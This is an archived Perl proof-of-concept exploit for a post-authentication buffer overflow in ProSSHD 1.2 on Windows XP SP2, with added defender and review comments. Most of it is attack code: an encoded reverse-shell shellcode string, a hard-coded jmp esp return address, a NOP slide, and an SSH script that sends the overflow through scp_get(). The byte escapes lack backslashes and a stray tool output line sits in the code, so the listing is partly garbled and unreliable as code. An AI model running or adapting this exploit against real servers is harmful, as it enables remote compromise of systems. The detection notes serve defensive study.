
prosshd-overflow.txt


# Exploit Title: ProSSHD buffer overflow
# Date: 2010.02.19
# Author: S2 Crew [Hungary]
# Software Link: http://www.labtam-inc.com/
# Version: 1.2 20090726
# Tested on: Windows XP SP2 EN
# CVE: -
# Registers:
# EAX 000003E4
# ECX 0012ED44
# EDX 7C90EB94 ntdll.KiFastSystemCallRet
# EBX 00000674
# ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..."
# EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..."
# ESI 7C81DD9A kernel32.CreatePipe
# EDI 0012F3D8 ASCII "BBBBBBBBBBBBBBBBBBB..."
# EIP 77D5B8D6 USER32.77D5B8D6
#
# Archived proof-of-concept listing, reproduced as published (only line
# breaks restored). What the script demonstrably does: opens an SSH session
# with Net::SSH2, authenticates with a username/password, and hands an
# oversized string to scp_get() as the requested path. The register dump
# above is the author's crash record from the tested build.
#
# Defender notes:
#  - The trigger is post-authentication (auth_password must succeed), so
#    the exposure is to any account that can log in, not to anonymous
#    clients.
#  - The request path built below is over 1.5 KB long; an SCP/SFTP request
#    path of that size from a real client is anomalous and is a usable
#    detection point in server or proxy logs.
#  - The return address is a hard-coded user32.dll address for the tested
#    Windows XP SP2 build (see "jmp esp" comment below); it is tied to that
#    exact image layout.
#  - No fixed release is named on this page; TODO confirm the patched
#    ProSSHD version against the vendor's advisories before relying on an
#    upgrade as the mitigation.
#!/usr/bin/perl
use Net::SSH2;

# NOTE(review): no `use strict; use warnings;` — every variable below is an
# undeclared package global.
$username = 'test';
$password = 'test';
$host = '172.16.29.133';
$port = 22;

# NOTE(review): the next line is payload-generator console output that was
# pasted into the listing; it is not Perl.
[*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_shell_tcp
# Encoded payload string as published. The string escapes appear exactly as
# the archived copy shows them.
$shell = "x89xe5xdaxd7xd9x75xf4x5ex56x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx48x68x4ex69x45x50x47x70" .
"x43x30x51x70x4fx79x4bx55x44x71x4ex32x51x74" .
"x4ex6bx43x62x44x70x4ex6bx46x32x46x6cx4ex6b" .
"x51x42x45x44x4cx4bx50x72x51x38x46x6fx4fx47" .
"x51x5ax51x36x50x31x4bx4fx45x61x4bx70x4ex4c" .
"x47x4cx51x71x43x4cx47x72x46x4cx47x50x4ax61" .
"x48x4fx46x6dx45x51x4fx37x4dx32x4cx30x51x42" .
"x51x47x4ex6bx51x42x44x50x4cx4bx50x42x47x4c" .
"x43x31x48x50x4ex6bx43x70x51x68x4ex65x49x50" .
"x43x44x42x6ax47x71x4ex30x50x50x4cx4bx50x48" .
"x47x68x4ex6bx46x38x51x30x45x51x4bx63x48x63" .
"x47x4cx51x59x4cx4bx50x34x4cx4bx45x51x48x56" .
"x45x61x49x6fx50x31x49x50x4cx6cx49x51x48x4f" .
"x44x4dx45x51x4ax67x47x48x4dx30x50x75x48x74" .
"x43x33x43x4dx4cx38x45x6bx51x6dx46x44x43x45" .
"x4ax42x51x48x4ex6bx46x38x47x54x47x71x4ax73" .
"x42x46x4ex6bx44x4cx42x6bx4cx4bx51x48x47x6c" .
"x46x61x4ex33x4cx4bx43x34x4cx4bx46x61x48x50" .
"x4dx59x43x74x44x64x46x44x51x4bx43x6bx50x61" .
"x43x69x51x4ax46x31x4bx4fx49x70x43x68x43x6f" .
"x50x5ax4cx4bx42x32x48x6bx4bx36x51x4dx50x68" .
"x45x63x45x62x47x70x45x50x42x48x42x57x44x33" .
"x45x62x43x6fx46x34x42x48x50x4cx42x57x51x36" .
"x44x47x49x6fx4ax75x4fx48x4cx50x46x61x47x70" .
"x45x50x45x79x4fx34x46x34x46x30x50x68x45x79" .
"x4bx30x42x4bx47x70x49x6fx4bx65x46x30x42x70" .
"x42x70x42x70x51x50x46x30x51x50x50x50x43x58" .
"x4bx5ax46x6fx49x4fx49x70x4bx4fx4ax75x4dx59" .
"x4bx77x43x58x4cx6cx44x50x47x6dx4bx30x50x68" .
"x44x42x45x50x46x71x51x4cx4fx79x49x76x50x6a" .
"x46x70x50x56x51x47x42x48x4ax39x4fx55x51x64" .
"x45x31x4bx4fx4ax75x50x68x42x43x50x6dx45x34" .
"x45x50x4ex69x4ax43x50x57x50x57x46x37x45x61" .
"x48x76x50x6ax44x52x43x69x42x76x4ax42x4bx4d" .
"x43x56x4ax67x51x54x44x64x47x4cx43x31x45x51" .
"x4ex6dx42x64x45x74x44x50x4ax66x47x70x43x74" .
"x50x54x46x30x43x66x43x66x46x36x47x36x42x76" .
"x50x4ex51x46x43x66x46x33x46x36x50x68x51x69" .
"x4ax6cx45x6fx4bx36x49x6fx4bx65x4bx39x49x70" .
"x50x4ex50x56x47x36x49x6fx46x50x43x58x46x68" .
"x4ex67x45x4dx43x50x4bx4fx49x45x4dx6bx4ax50" .
"x4ex55x49x32x43x66x50x68x49x36x4ax35x4dx6d" .
"x4dx4dx4bx4fx4ax75x45x6cx45x56x51x6cx45x5a" .
"x4bx30x4bx4bx49x70x42x55x43x35x4fx4bx47x37" .
"x46x73x43x42x42x4fx51x7ax43x30x50x53x49x6f" .
"x48x55x47x7ax41x41";
# jmp esp 0x77dc7c7b user32.dll
# Request path layout as written: 490 repeats of the filler token, the
# 4-byte address from the comment above, 1000 repeats of the slide token,
# then $shell. This whole string is what scp_get() sends as the path.
$fuzz = "x41"x490 . "x7Bx7CxDCx77". "x90"x1000 . $shell;
$ssh2 = Net::SSH2->new();
# Both checks use `||`, so a connect/auth failure dies with the fixed
# message; the underlying error from Net::SSH2 is not reported.
$ssh2->connect($host, $port) || die " Error: Connection Refused! ";
$ssh2->auth_password($username, $password) || die " Error: Username/Password Denied! ";
# The oversized path is sent in an already-authenticated session — this is
# the request a server-side log or IDS rule would need to flag.
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();

 
